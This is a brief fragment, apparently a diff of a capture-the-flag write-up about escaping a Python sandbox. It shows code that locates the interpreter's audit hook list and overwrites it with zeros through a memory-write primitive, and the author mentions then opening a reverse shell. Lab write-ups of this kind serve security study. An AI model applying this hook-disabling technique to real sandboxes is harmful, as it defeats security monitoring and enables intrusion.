Scoreboard & Thoughts

 audit_hook_head = audit_ptr + 0xe8ce0 + (383 * 8)

-Now that I knew where they were located I just 0’d them out so they would affect the program anymore and just popped a reverse shell using system
+Now that I knew where they were located, I just 0’d them out so they would affect the program anymore and just popped a reverse shell using system

 baset(xd, __build_class__.__self__.slice(audit_hook_head, audit_hook_head + 8), __build_class__.__self__.bytes([0]*8))